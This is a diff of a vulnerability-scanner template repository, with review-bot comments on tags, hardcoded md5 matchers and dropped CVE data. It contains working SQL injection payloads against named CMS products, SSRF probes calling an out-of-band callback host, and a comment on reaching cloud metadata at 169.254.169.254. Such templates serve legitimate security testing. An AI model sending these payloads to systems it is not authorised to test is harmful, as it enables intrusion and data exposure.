@@ -1,20 +1,24 @@ id: wordpress-db-repair + info: name: Wordpress DB Repair Exposed author: _C0wb0y_ severity: low description: Discover enabled Wordpress repair page. tags: wordpress,config,fpd + requests: - method: GET path: - "{{BaseURL}}/wp-admin/maint/repair.php" + matchers-condition: and matchers: - type: word words: - "WordPress" + - type: word words: - "define('WP_ALLOW_REPAIR', true);" - negative: true + negative: true \ No newline at end of file diff --git a/poc/sql/wordpress-tmm-db-migrate-11317.yaml b/poc/sql/wordpress-tmm-db-migrate-11317.yaml index d33b95d124..8e6ffbf93e 100644 --- a/poc/sql/wordpress-tmm-db-migrate-11317.yaml +++ b/poc/sql/wordpress-tmm-db-migrate-11317.yaml @@ -3,7 +3,7 @@ info: name: WordPress ThemeMarkers DB Migration File author: dwisiswant0 severity: info - tags: wordpress,wp-plugin,backup + tags: wordpress,wp-plugin,backups requests: - method: GET path: diff --git a/poc/sql/wuzhicms-sqli-11658.yaml b/poc/sql/wuzhicms-sqli-11658.yaml index fbb326fda5..b972d9a3d9 100644 --- a/poc/sql/wuzhicms-sqli-11658.yaml +++ b/poc/sql/wuzhicms-sqli-11658.yaml @@ -5,6 +5,7 @@ info: severity: high reference: https://github.com/wuzhicms/wuzhicms/issues/184 tags: wuzhicms,sqli + requests: - method: GET path: diff --git a/poc/sql/zcms-v3-sqli.yaml b/poc/sql/zcms-v3-sqli.yaml index a7084a23d3..ed56b88314 100644 --- a/poc/sql/zcms-v3-sqli.yaml +++ b/poc/sql/zcms-v3-sqli.yaml 
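Review bot: The tag in wordpress-tmm-db-migrate-11317.yaml changes from `backup` to `backups`, while sql-dump-10497.yaml in this same commit uses `backup` (`tags: exposure,backup,mysql`). Tag selection is an exact string match as far as I know, so a scan scoped to `backup` would no longer include this template. Keep `tags: wordpress,wp-plugin,backup` unless the whole collection is being renamed.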
@@ -6,18 +6,16 @@ info: reference: - https://www.anquanke.com/post/id/183241 tags: zcms,sqli -variables: - num: "999999999" requests: - method: GET path: - - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'" + - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'" matchers-condition: and matchers: - - type: word - words: - - '{{md5({{num}})}}' - part: body - type: status status: - 200 + - type: word + words: + - "6f7c6dcbc380aac3bcba1f9fccec991e" + part: body diff --git a/poc/sql_injection/74cms-sqli-8.yaml b/poc/sql_injection/74cms-sqli-8.yaml index 64afb3631a..afd5c1aac4 100644 --- a/poc/sql_injection/74cms-sqli-8.yaml +++ b/poc/sql_injection/74cms-sqli-8.yaml @@ -1,4 +1,5 @@ id: CVE-2020-22210 + info: name: 74cms - ajax_officebuilding.php SQL Injection author: ritikchaddha @@ -13,16 +14,22 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22210 cwe-id: CWE-89 + cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* + epss-score: 0.12933 metadata: + max-request: 1 fofa-query: app="74cms" shodan-query: http.html:"74cms" tags: cve,cve2020,74cms,sqli + variables: num: "999999999" -requests: + +http: - method: GET path: - '{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23' + matchers: - type: word part: body diff --git a/poc/sql_injection/Arcms-json_newslist-sqli.yaml b/poc/sql_injection/Arcms-json_newslist-sqli.yaml old mode 100755 new mode 100644 diff --git a/poc/sql_injection/BlueCMS_v1-adjs-sqli.yaml b/poc/sql_injection/BlueCMS_v1-adjs-sqli.yaml old mode 100755 new mode 100644 
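Review bot: The zcms-v3-sqli.yaml hunk replaces the `num` variable and the computed `'{{md5({{num}})}}'` matcher with two literals, `md5(202072102)` in the path and `6f7c6dcbc380aac3bcba1f9fccec991e` in the matcher, which now have to be kept in step by hand. If either one is edited alone the template stops matching without raising any error. 74cms-sqli-8.yaml in this commit still declares `variables:` and uses `{{num}}` in its path, so the two templates are also inconsistent with each other. If the literals stay, add a comment next to the word such as `# md5 of the number sent in the path`. The same change is repeated in poc/sql_injection/zcms-v3-sqli.yaml.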
diff --git a/poc/sql_injection/GLPI-9.3.3-SQL-Injection.yaml b/poc/sql_injection/GLPI-9.3.3-SQL-Injection.yaml
index e7c97f72d9..98a2a439f1 100644
--- a/poc/sql_injection/GLPI-9.3.3-SQL-Injection.yaml
+++ b/poc/sql_injection/GLPI-9.3.3-SQL-Injection.yaml
@@ -1,30 +1,25 @@ ---- -id: GLPI_SQL_Injection - -info: - author: RedTeamBrasil - description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication." - name: "Pre-authenticated SQL injection in GLPI <= 9.3.3" - reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf" - severity: high - tags: "glpi,cve,sqli" - -requests: - - - matchers: - - - part: body - type: word - words: - - "-MariaDB-" - max-redirects: 3 - method: GET - path: - - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - redirects: true - extractors: - - type: regex - part: body - regex: - - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" \ No newline at end of file +id: GLPI_SQL_Injection +info: + author: RedTeamBrasil + description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication." 
+ name: "Pre-authenticated SQL injection in GLPI <= 9.3.3" + reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf" + severity: high + tags: "glpi,cve,sqli" +requests: + - matchers: + - part: body + type: word + words: + - "-MariaDB-" + max-redirects: 3 + method: GET + path: + - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + redirects: true + extractors: + - type: regex + part: body + regex: + - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" diff --git a/poc/sql_injection/Maticsoft-Shop-sqli.yaml b/poc/sql_injection/Maticsoft-Shop-sqli.yaml index 4a87f191a9..06e83a6789 100644 --- a/poc/sql_injection/Maticsoft-Shop-sqli.yaml +++ b/poc/sql_injection/Maticsoft-Shop-sqli.yaml @@ -1,16 +1,13 @@ id: Maticsoft-Shop-sqli - info: name: Maticsoft-Shop商城CategoryId参数SQL注入 author: Str1am severity: high tags: Maticsoft,sqli - requests: - method: GET path: - "{{BaseURL}}/NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20AND%201=@@version" - matchers-condition: and matchers: - type: word diff --git a/poc/sql_injection/elasticsearch-sql-client-detect.yaml b/poc/sql_injection/elasticsearch-sql-client-detect.yaml index e075189456..b6efdc2579 100644 --- a/poc/sql_injection/elasticsearch-sql-client-detect.yaml +++ b/poc/sql_injection/elasticsearch-sql-client-detect.yaml 
@@ -1,23 +1,24 @@ -id: elasticsearch-sql-client-detect -info: - name: Elasticsearch SQL Client Detect - author: pussycat0x - severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 - tags: elasticsearch,tech,sql +id: elasticsearch-sql-client-detect -requests: - - method: GET - path: - - '{{BaseURL}}' +info: + name: Elasticsearch SQL Client Detect + author: pussycat0x + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 + tags: elasticsearch,tech,sql - matchers-condition: and - matchers: - - type: word - words: - - '<title>Elasticsearch-sql client' - part: body - - - type: status - status: - - 200 +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Elasticsearch-sql client' + part: body + + - type: status + status: + - 200 diff --git a/poc/sql_injection/exposed-sqlite-manager-7350.yaml b/poc/sql_injection/exposed-sqlite-manager-7350.yaml index a76ba9d93d..cff80e3ad5 100644 --- a/poc/sql_injection/exposed-sqlite-manager-7350.yaml +++ b/poc/sql_injection/exposed-sqlite-manager-7350.yaml @@ -1,18 +1,15 @@ id: exposed-sqlite-manager - info: name: SQLiteManager author: dhiyaneshDK severity: medium reference: https://www.exploit-db.com/ghdb/5003 tags: sqlite - requests: - method: GET path: - '{{BaseURL}}/sqlite/' - '{{BaseURL}}/sqlitemanager/' - matchers-condition: and matchers: - type: word diff --git a/poc/sql_injection/sql-dump-10497.yaml b/poc/sql_injection/sql-dump-10497.yaml index 05e97713ac..0bf0d2bcb0 100644 --- a/poc/sql_injection/sql-dump-10497.yaml +++ b/poc/sql_injection/sql-dump-10497.yaml @@ -1,9 +1,11 @@ id: default-sql-dump + info: name: MySQL Dump Files - author: geeknik & @dwisiswant0 + author: geeknik,dwisiswant0 severity: medium - tags: exposure,backup + tags: exposure,backup,mysql + requests: - method: GET path: 
@@ -28,6 +30,7 @@ requests: - "{{BaseURL}}/wp-content/uploads/dump.sql" headers: Range: "bytes=0-3000" + max-size: 2000 # Size in bytes - Max Size to read from server response matchers-condition: and matchers: @@ -35,6 +38,7 @@ requests: regex: - "(?m)(?:DROP|CREATE|(?:UN)?LOCK) TABLE|INSERT INTO" part: body + - type: status status: - 200 diff --git a/poc/sql_injection/sqliheader.yaml b/poc/sql_injection/sqliheader.yaml index 832a9fc156..012bac2af3 100644 --- a/poc/sql_injection/sqliheader.yaml +++ b/poc/sql_injection/sqliheader.yaml @@ -1,8 +1,10 @@ id: header-sqli + info: name: Request header based sqli - author: panch0r3d + author: nithissh severity: high + requests: - method: GET path: diff --git a/poc/sql_injection/weiphp-sql-injection.yaml b/poc/sql_injection/weiphp-sql-injection.yaml index 8b0c9a5a1a..2b57dda7f7 100644 --- a/poc/sql_injection/weiphp-sql-injection.yaml +++ b/poc/sql_injection/weiphp-sql-injection.yaml @@ -1,24 +1,28 @@ id: weiphp-sql-injection + info: name: WeiPHP 5.0 SQLI author: pikpikcu severity: high - reference: - - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md - metadata: - verified: true - shodan-query: http.html:"WeiPHP5.0" + reference: https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md tags: weiphp,sql + requests: - method: POST path: - "{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ " + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: + - type: word - part: body words: - "52c69e3a57331081823331c4e69d3f2" + part: body + condition: and + - type: status status: - 500 diff --git a/poc/sql_injection/wuzhicms-sqli-11658.yaml b/poc/sql_injection/wuzhicms-sqli-11658.yaml index fbb326fda5..b972d9a3d9 100644 --- a/poc/sql_injection/wuzhicms-sqli-11658.yaml 
+++ b/poc/sql_injection/wuzhicms-sqli-11658.yaml @@ -5,6 +5,7 @@ info: severity: high reference: https://github.com/wuzhicms/wuzhicms/issues/184 tags: wuzhicms,sqli + requests: - method: GET path: diff --git a/poc/sql_injection/zcms-v3-sqli.yaml b/poc/sql_injection/zcms-v3-sqli.yaml index a7084a23d3..ed56b88314 100644 --- a/poc/sql_injection/zcms-v3-sqli.yaml +++ b/poc/sql_injection/zcms-v3-sqli.yaml @@ -6,18 +6,16 @@ info: reference: - https://www.anquanke.com/post/id/183241 tags: zcms,sqli -variables: - num: "999999999" requests: - method: GET path: - - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'" + - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'" matchers-condition: and matchers: - - type: word - words: - - '{{md5({{num}})}}' - part: body - type: status status: - 200 + - type: word + words: + - "6f7c6dcbc380aac3bcba1f9fccec991e" + part: body diff --git a/poc/ssh/circleci-ssh-config.yaml b/poc/ssh/circleci-ssh-config.yaml index 3c3d245991..0d19b816b8 100644 --- a/poc/ssh/circleci-ssh-config.yaml +++ b/poc/ssh/circleci-ssh-config.yaml @@ -4,7 +4,7 @@ info: name: circleci ssh-config exposure author: geeknik severity: low - tags: config,exposure + tags: config,exposure,circleci requests: - method: GET diff --git a/poc/ssh/ssh-known-hosts.yaml b/poc/ssh/ssh-known-hosts.yaml index ccdc97175e..100d60c2e3 100644 --- a/poc/ssh/ssh-known-hosts.yaml +++ b/poc/ssh/ssh-known-hosts.yaml 
@@ -1,18 +1,15 @@ id: ssh-known-hosts - info: name: SSH Known Hosts author: geeknik reference: https://datacadamia.com/ssh/known_hosts severity: low tags: config,exposure,ssh - requests: - method: GET path: - "{{BaseURL}}/.ssh/known_hosts" - "{{BaseURL}}/.ssh/known_hosts.old" - matchers-condition: and matchers: - type: word @@ -22,7 +19,6 @@ requests: - "ssh-rsa" - "ecdsa-sha2-nistp256" condition: or - - type: status status: - 200 diff --git a/poc/ssrf/cloudflare-image-ssrf.yaml b/poc/ssrf/cloudflare-image-ssrf.yaml index 53750448b2..2674cd7f60 100644 --- a/poc/ssrf/cloudflare-image-ssrf.yaml +++ b/poc/ssrf/cloudflare-image-ssrf.yaml @@ -6,17 +6,14 @@ info: severity: info description: Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin. reference: https://support.cloudflare.com/hc/en-us/articles/360028146432-Understanding-Cloudflare-Image-Resizing#12345684 - tags: cloudflare,misconfig,oob + tags: cloudflare,misconfig,oast requests: - raw: - | GET /cdn-cgi/image/width/https://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 - Connection: close Accept: */* - Accept-Language: en matchers: - type: word diff --git a/poc/ssrf/linkerd-ssrf-detect.yaml b/poc/ssrf/linkerd-ssrf-detect.yaml index ad99f869a7..16b0eb2d0f 100644 --- a/poc/ssrf/linkerd-ssrf-detect.yaml +++ b/poc/ssrf/linkerd-ssrf-detect.yaml @@ -1,5 +1,4 @@ id: linkerd-ssrf-detect - # Detect the Linkerd service by overriding the delegation table and # inspect the response for: # - a "Via: .. linkerd .." 
@@ -14,19 +13,16 @@ id: linkerd-ssrf-detect # # - "l5d-dtab: /svc/* => /$/inet/yourserver.com/80", to get to other external hosts # - "l5d-dtab: /svc/* => /$/inet/169.254.169.254/80", to get to cloud metadata - info: name: Linkerd SSRF detection author: dudez severity: info - requests: - method: GET path: - "{{BaseURL}}/" headers: l5d-dtab: /svc/* => /$/inet/example.com/443 - matchers-condition: or matchers: - type: regex @@ -34,31 +30,26 @@ requests: regex: - '(?mi)^Via\s*?:.*?linkerd.*$' part: header - - type: regex name: l5d-err-present regex: - '(?mi)^l5d-err:.*$' part: header - - type: regex name: l5d-success-class-present regex: - '(?mi)^l5d-success-class: 0.*$' part: header - - type: word name: ssrf-response-body words: - '

This domain is for use in illustrative examples in documents.' part: body - - type: regex name: resolve-timeout-error-present regex: - '(?mi)Exceeded .*? binding timeout while resolving name' part: body - - type: regex name: dynbind-error-present regex: diff --git a/poc/ssrf/microstrategy-ssrf-8861.yaml b/poc/ssrf/microstrategy-ssrf-8861.yaml index 1af06976e2..4d08720f94 100644 --- a/poc/ssrf/microstrategy-ssrf-8861.yaml +++ b/poc/ssrf/microstrategy-ssrf-8861.yaml @@ -4,8 +4,8 @@ info: author: organiccrap severity: high description: Blind server-side request forgery vulnerability on MicroStrategy URL shortener. - # reference: https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204 - + reference: https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204 + tags: microstrategy,ssrf requests: - method: GET path: diff --git a/poc/ssrf/ssrf-via-oauth-misconfig.yaml b/poc/ssrf/ssrf-via-oauth-misconfig.yaml index dcf32597cc..9fe1869a10 100644 --- a/poc/ssrf/ssrf-via-oauth-misconfig.yaml +++ b/poc/ssrf/ssrf-via-oauth-misconfig.yaml @@ -4,9 +4,8 @@ info: author: KabirSuda severity: medium description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters. - reference: - - https://portswigger.net/research/hidden-oauth-attack-vectors tags: misconfig,oast,oauth,ssrf + reference: https://portswigger.net/research/hidden-oauth-attack-vectors requests: - raw: - | diff --git a/poc/ssrf/vmware-vcenter-ssrf.yaml b/poc/ssrf/vmware-vcenter-ssrf.yaml index 4bd82a9b23..a842c409e1 100644 --- a/poc/ssrf/vmware-vcenter-ssrf.yaml +++ b/poc/ssrf/vmware-vcenter-ssrf.yaml 
@@ -1,24 +1,21 @@ id: vmware-vcenter-ssrf - info: name: VMware vCenter SSRF/LFI/XSS author: pdteam severity: critical - reference: https://github.com/l0ggg/VMware_vCenter + reference: + - https://github.com/l0ggg/VMware_vCenter tags: ssrf,lfi,xss,oast,vcenter,vmware - requests: - method: GET path: - "{{BaseURL}}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}" - matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - - type: status status: - 200 diff --git a/poc/ssrf/w3c-total-cache-ssrf-11077.yaml b/poc/ssrf/w3c-total-cache-ssrf-11077.yaml index ce589aee75..e85cc156ae 100644 --- a/poc/ssrf/w3c-total-cache-ssrf-11077.yaml +++ b/poc/ssrf/w3c-total-cache-ssrf-11077.yaml @@ -1,13 +1,14 @@ id: w3c-total-cache-ssrf info: name: Wordpress W3C Total Cache SSRF <= 0.9.4 - author: random-robbie + author: random_robbie severity: medium - tags: wordpress,wp-plugin + tags: wordpress,wp-plugin,cache,ssrf description: The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability. - reference: | + reference: - https://wpvulndb.com/vulnerabilities/8644 - https://klikki.fi/adv/w3_total_cache.html + requests: - method: GET path: diff --git a/poc/ssrf/w3c-total-cache-ssrf.yaml b/poc/ssrf/w3c-total-cache-ssrf.yaml index ba650020ae..dcb07f9d0e 100644 --- a/poc/ssrf/w3c-total-cache-ssrf.yaml +++ b/poc/ssrf/w3c-total-cache-ssrf.yaml @@ -4,9 +4,11 @@ info: author: random-robbie severity: medium tags: wordpress,wp-plugin + # Reference # https://wpvulndb.com/vulnerabilities/8644 # https://klikki.fi/adv/w3_total_cache.html + requests: - method: GET path: @@ -15,4 +17,4 @@ requests: - type: word words: - "NessusFileIncludeTest" - part: body + part: body \ No newline at end of file diff --git a/poc/ssrf/xmlrpc-pingback-ssrf-11689.yaml b/poc/ssrf/xmlrpc-pingback-ssrf-11689.yaml index 4d87c3fbeb..be57a6b501 100644 --- a/poc/ssrf/xmlrpc-pingback-ssrf-11689.yaml 
+++ b/poc/ssrf/xmlrpc-pingback-ssrf-11689.yaml @@ -2,21 +2,16 @@ id: xmlrpc-pingback-ssrf info: name: XMLRPC Pingback SSRF author: geeknik - reference: https://hackerone.com/reports/406387 severity: high + reference: + - https://hackerone.com/reports/406387 + tags: ssrf,generic,xmlrpc requests: - raw: - | POST /xmlrpc/pingback HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 - Accept-Encoding: gzip, deflate - Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; ANONYMOUS_USER_ID=2922001 - Connection: close - Upgrade-Insecure-Requests: 1 - Content-Length: 305 @@ -25,15 +20,10 @@ requests: http://{{interactsh-url}} - - https://{{Hostname}}/web/guest/home/ - - matchers-condition: and matchers: - type: word - part: interactsh-protocol + part: interactsh_protocol words: - - "dns" - "http" diff --git a/poc/ssrf/zimbra-preauth-ssrf-11810.yaml b/poc/ssrf/zimbra-preauth-ssrf-11810.yaml index 1fad6022fa..8f955e0f3f 100644 --- a/poc/ssrf/zimbra-preauth-ssrf-11810.yaml +++ b/poc/ssrf/zimbra-preauth-ssrf-11810.yaml 
@@ -1,34 +1,20 @@ id: zimbra-preauth-ssrf - info: - name: Zimbra Collaboration Suite - Server-Side Request Forgery + name: Zimbra Collaboration Suite (ZCS) - SSRF author: gy741 severity: critical - description: Zimbra Collaboration Suite (ZCS) allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code. + description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code. reference: - https://www.adminxe.com/2183.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-7796 - - https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-7796 - cwe-id: CWE-918 tags: zimbra,ssrf,oast - metadata: - max-request: 1 - -http: +requests: - raw: - | GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1 Host: {{Hostname}} Accept: */* - matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# Enhanced by mp on 2022/06/03 diff --git a/poc/subdomain_takeover/acquia-takeover-35.yaml b/poc/subdomain_takeover/acquia-takeover-35.yaml index fa267bacc3..3740c22e91 100644 --- a/poc/subdomain_takeover/acquia-takeover-35.yaml +++ b/poc/subdomain_takeover/acquia-takeover-35.yaml @@ -2,7 +2,7 @@ id: acquia-takeover info: name: Acquia Takeover Detection - author: pdcommunity + author: pdteam severity: info tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz diff --git a/poc/subdomain_takeover/aftership-takeover.yaml b/poc/subdomain_takeover/aftership-takeover.yaml index cda98eeb27..9407e028c7 100644 --- a/poc/subdomain_takeover/aftership-takeover.yaml +++ b/poc/subdomain_takeover/aftership-takeover.yaml 
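Review bot: The zimbra-preauth-ssrf-11810.yaml hunk drops the whole `classification:` block (`cve-id: CVE-2020-7796`, `cwe-id: CWE-918`, the CVSS vector) and the NVD and vendor release references from a template rated critical. Without `cve-id` the finding can no longer be joined to vulnerability-management data or to the vendor patch note, so keep the block and both references. The protocol key also goes from `http:` back to `requests:`, the opposite direction to the 74cms-sqli-8.yaml hunk in this commit; as far as I know `http:` is the current key and `requests:` the legacy alias, so use `http:` in both.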
@@ -3,9 +3,8 @@ info: name: Aftership Takeover Detection author: pdteam severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: diff --git a/poc/subdomain_takeover/agilecrm-takeover-211.yaml b/poc/subdomain_takeover/agilecrm-takeover-211.yaml index 03cb27aec2..9639c4a23f 100644 --- a/poc/subdomain_takeover/agilecrm-takeover-211.yaml +++ b/poc/subdomain_takeover/agilecrm-takeover-211.yaml @@ -1,10 +1,11 @@ id: agilecrm-takeover info: name: agilecrm takeover detection - author: pdcommunity + author: pdteam severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: diff --git a/poc/subdomain_takeover/aha-takeover-214.yaml b/poc/subdomain_takeover/aha-takeover-214.yaml index 2cd6bcb83d..649b36b6e5 100644 --- a/poc/subdomain_takeover/aha-takeover-214.yaml +++ b/poc/subdomain_takeover/aha-takeover-214.yaml @@ -1,18 +1,15 @@ id: aha-takeover - info: name: Aha Takeover Detection - author: pdteam + author: pdcommunity severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz - requests: - method: GET path: - "{{BaseURL}}" - matchers: - type: word words: - - There is no portal here ... sending you back to Aha! \ No newline at end of file + - There is no portal here ... sending you back to Aha! diff --git a/poc/subdomain_takeover/announcekit-takeover-321.yaml b/poc/subdomain_takeover/announcekit-takeover-321.yaml index 9326076abe..340dd72666 100644 --- a/poc/subdomain_takeover/announcekit-takeover-321.yaml +++ b/poc/subdomain_takeover/announcekit-takeover-321.yaml 
@@ -1,28 +1,31 @@ -id: announcekit-takeover -info: - name: Announcekit Takeover Detection - author: melbadry9 - severity: high - tags: takeover,announcekit - reference: - - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit - - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228 -requests: - - method: GET - raw: - - |2 - GET / HTTP/1.1 - - Host: {{Hostname}} - - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - redirects: true - max-redirects: 1 - matchers-condition: and - matchers: - - type: word - words: - - 'Error 404 - AnnounceKit' - - type: status - status: - - 404 +id: announcekit-takeover + +info: + name: Announcekit Takeover Detection + author: melbadry9 + severity: high + tags: takeover,announcekit + reference: + - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228 + +requests: + - method: GET + raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + + redirects: true + max-redirects: 1 + + matchers-condition: and + matchers: + - type: word + words: + - 'Error 404 - AnnounceKit' + + - type: status + status: + - 404 diff --git a/poc/subdomain_takeover/bitbucket-takeover-740.yaml b/poc/subdomain_takeover/bitbucket-takeover-740.yaml index f9234ad7a3..2987941c14 100644 --- a/poc/subdomain_takeover/bitbucket-takeover-740.yaml +++ b/poc/subdomain_takeover/bitbucket-takeover-740.yaml @@ -1,25 +1,21 @@ id: bitbucket-takeover - info: name: Bitbucket Takeover Detection author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz - requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word words: - "Repository not found" part: body - - type: word words: - "text/plain" - part: header \ No newline at end of file + part: header 
diff --git a/poc/subdomain_takeover/brightcove-takeover.yaml b/poc/subdomain_takeover/brightcove-takeover.yaml index 31f1fae0cd..3c169edae2 100644 --- a/poc/subdomain_takeover/brightcove-takeover.yaml +++ b/poc/subdomain_takeover/brightcove-takeover.yaml @@ -1,10 +1,11 @@ id: brightcove-takeover info: name: brightcove takeover detection - author: pdcommunity + author: pdteam severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: diff --git a/poc/subdomain_takeover/cargo-takeover-866.yaml b/poc/subdomain_takeover/cargo-takeover-866.yaml index bd7f124269..f429fe1679 100644 --- a/poc/subdomain_takeover/cargo-takeover-866.yaml +++ b/poc/subdomain_takeover/cargo-takeover-866.yaml @@ -1,15 +1,18 @@ id: cargo-takeover + info: name: cargo takeover detection author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - - "If you're moving your domain away from Cargo you must make this configuration through your registrar's DNS control panel." + - "If you're moving your domain away from Cargo you must make this configuration through your registrar's DNS control panel." \ No newline at end of file diff --git a/poc/subdomain_takeover/feedpress-takeover-7458.yaml b/poc/subdomain_takeover/feedpress-takeover-7458.yaml index f2819bdef7..ddd26565e1 100644 --- a/poc/subdomain_takeover/feedpress-takeover-7458.yaml +++ b/poc/subdomain_takeover/feedpress-takeover-7458.yaml @@ -1,11 +1,10 @@ id: feedpress-takeover info: name: Agilecrm Takeover Detection - author: pdteam + author: pdcommunity severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: 
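Review bot: `name: Agilecrm Takeover Detection` stays on the new side of feedpress-takeover although the `id` is `feedpress-takeover`, so findings are reported under the wrong service name. `name: Feedpress Takeover Detection` would match the id. The hunk only touches `author` and `reference`, and the matcher lines are outside it, so it is not possible to confirm from here which service's error string the template actually matches.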
